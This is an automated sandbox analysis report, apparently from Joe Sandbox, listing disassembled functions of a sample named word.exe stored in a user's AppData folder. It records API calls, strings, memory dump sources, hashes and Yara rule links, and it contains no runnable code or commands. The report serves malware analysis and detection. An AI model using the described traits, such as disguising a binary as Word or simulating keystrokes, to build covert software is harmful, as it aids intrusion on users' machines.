                                                                            • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                                                                            Function 00479C97 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 274COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00479D1F
                                                                            • VariantInit.OLEAUT32(?), ref: 00479F06
                                                                            • VariantClear.OLEAUT32(?), ref: 00479F11
                                                                            • VariantInit.OLEAUT32(?), ref: 00479DF7
                                                                              • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                                                              • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                                                              • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                                                            • VariantClear.OLEAUT32(?), ref: 00479F9C
                                                                              • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                                                                            • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                            • API String ID: 665237470-60002521
                                                                            • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                            • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                                            • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                            • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                                                            Function 00440B39 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 261COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem
                                                                            • String ID: X+
                                                                            • API String ID: 4116985748-1938338529
                                                                            • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                            • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                                                                            • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                            • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                                                                            Function 0045377F Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 236windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                            • _memset.LIBCMT ref: 004538C4
                                                                            • GetMenuItemInfoW.USER32 ref: 004538EF
                                                                            • _wcslen.LIBCMT ref: 00453960
                                                                            • SetMenuItemInfoW.USER32 ref: 004539C4
                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004539E0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                                                                            • String ID: 0$p+$p+
                                                                            • API String ID: 3530711334-3829631072
                                                                            • Opcode ID: f8b7da67bd46f6d3acaa256ed113b1c9c09b209eebf999d73fbf05c6f83275f6
                                                                            • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                                                                            • Opcode Fuzzy Hash: f8b7da67bd46f6d3acaa256ed113b1c9c09b209eebf999d73fbf05c6f83275f6
                                                                            • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                                                                            Function 0046A75F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 179registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ConnectRegistry_wcslen
                                                                            • String ID: HH
                                                                            • API String ID: 535477410-2761332787
                                                                            • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                            • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                                                                            • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                            • Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
                                                                            Function 004498BD Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: X+
                                                                            • API String ID: 0-1938338529
                                                                            • Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                            • Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
                                                                            • Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                            • Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
                                                                            Function 0045F2C5 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 146windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                            • String ID: 0$2
                                                                            • API String ID: 3311875123-3793063076
                                                                            • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                            • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                                                                            • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                            • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                                                                            Function 00448877 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 130windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                                                            • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                            • ShowWindow.USER32(004A83D8,00000000), ref: 00448C37
                                                                            • ShowWindow.USER32(004A83D8,00000004), ref: 00448C43
                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Enable$Show$MessageMoveSend
                                                                            • String ID: X+
                                                                            • API String ID: 896007046-1938338529
                                                                            • Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                            • Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
                                                                            • Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                            • Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
                                                                            Function 004413F0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 114windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                            • SendMessageW.USER32(002BE158,000000F1,00000000,00000000), ref: 004414C6
                                                                            • SendMessageW.USER32(002BE158,000000F1,00000001,00000000), ref: 004414F1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow
                                                                            • String ID: X+
                                                                            • API String ID: 312131281-1938338529
                                                                            • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                            • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                                                                            • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                            • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                                                                            Function 0043717F Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 46windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\AppData\Roaming\word.exe), ref: 0043719E
                                                                            • LoadStringW.USER32(00000000), ref: 004371A7
                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                                                                            • LoadStringW.USER32(00000000), ref: 004371C0
                                                                            • _printf.LIBCMT ref: 004371EC
                                                                            • MessageBoxW.USER32 ref: 00437208
                                                                            Strings
                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                                                                            • C:\Users\user\AppData\Roaming\word.exe, xrefs: 00437189
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString$Message_printf
                                                                            • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\AppData\Roaming\word.exe
                                                                            • API String ID: 220974073-1105308645
                                                                            • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                            • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                                                                            • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                            • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
                                                                            Function 00456168 Relevance: 13.7, APIs: 9, Instructions: 181COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                            • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                                                                            • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                            • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                                                                            Function 004534EB Relevance: 13.6, APIs: 9, Instructions: 150filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Roaming\word.exe,?,C:\Users\user\AppData\Roaming\word.exe,004A8E80,C:\Users\user\AppData\Roaming\word.exe,0040F3D2), ref: 0040FFCA
                                                                              • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                                                                            • MoveFileW.KERNEL32 ref: 0045358E
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 978794511-0
                                                                            • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                            • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                                                                            • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                            • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                                                                            Function 004417BC Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                            • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                                                                            • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                            • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                                                                            Function 00455EF5 Relevance: 13.6, APIs: 9, Instructions: 126windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00455F01
                                                                            • _memset.LIBCMT ref: 00455F12
                                                                            • SendMessageW.USER32 ref: 00455F43
                                                                            • SendMessageW.USER32(?,0000104B,00000000,?), ref: 00455F82
                                                                            • SendMessageW.USER32(?,0000104B,00000000,00000001), ref: 00455FF5
                                                                            • _wcslen.LIBCMT ref: 00455FFC
                                                                            • _wcslen.LIBCMT ref: 00456018
                                                                            • CharNextW.USER32(00000000), ref: 00456034
                                                                            • SendMessageW.USER32(?,0000104B,00000000,00000001), ref: 00456060
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$_wcslen$CharLongNextWindow_memset
                                                                            • String ID:
                                                                            • API String ID: 2321321212-0
                                                                            • Opcode ID: 56a67735f7a5bb8cc0a1c357c9749c25dc37e6f8b8df9cef775033d7e934ef4e
                                                                            • Instruction ID: 728fd5b54b682decfcd50b06f9b7fb359c8698431e162ed45c662fcf507213b6
                                                                            • Opcode Fuzzy Hash: 56a67735f7a5bb8cc0a1c357c9749c25dc37e6f8b8df9cef775033d7e934ef4e
                                                                            • Instruction Fuzzy Hash: 5D41D172204241ABE3108F68DC45BABB7E4FB84321F004A2EF954D72D1E7B9904A8B66
                                                                            Function 00445CF9 Relevance: 13.6, APIs: 9, Instructions: 69sleepkeyboardwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                                                                              • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32(00000000,?,00000001,00478FA7), ref: 00445964
                                                                              • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001), ref: 0044596B
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                                                                            • PostMessageW.USER32 ref: 00445D35
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                                                                            • PostMessageW.USER32 ref: 00445D66
                                                                            • Sleep.KERNEL32(00000000), ref: 00445D70
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                                                                            • PostMessageW.USER32 ref: 00445D8B
                                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                            • String ID:
                                                                            • API String ID: 2014098862-0
                                                                            • Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                            • Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
                                                                            • Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                            • Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
                                                                            Function 0047B1D0 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 489COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: X+
                                                                            • API String ID: 0-1938338529
                                                                            • Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                            • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                                                                            • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                            • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                                                                            Function 0045427D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 259libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
